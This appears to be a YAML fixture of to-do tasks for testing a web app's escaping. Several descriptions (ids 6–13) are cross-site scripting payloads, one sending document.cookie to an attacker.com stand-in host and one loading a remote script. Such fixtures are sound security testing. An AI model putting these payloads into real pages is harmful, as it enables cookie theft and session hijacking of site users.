---
tasks:
- id: 2
  title: Make cookies
  description: Cookies are love
- id: 3
  title: put tape on cars
  description: so I can paint them again
- id: 4
  title: Do stuff
  description: "cuz stuff\r\n"
- id: 5
  title: Do stuff
  description: cuz stuff
- id: 6
  title: Do stuff
  description: "<b>fancy<blink>tags"
- id: 7
  title: Do stuff
  description: "'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi
    ?foo='+document.cookie</script>'."
- id: 8
  title: Do stuff
  description: "<PLAINTEXT>"
- id: 9
  title: Do stuff
  description: "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";\r\nalert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\r\n></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"
- id: 10
  title: Do stuff
  description: "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\r\n></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"
- id: 11
  title: Do stuff
  description: <a onmouseover=alert(document.cookie)>xxs link</a>></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- id: 12
  title: Do stuff
  description: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- id: 13
  title: Do stuff
  description: "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;\r\n&#39;&#88;&#83;&#83;&#39;&#41;>"
total: 13
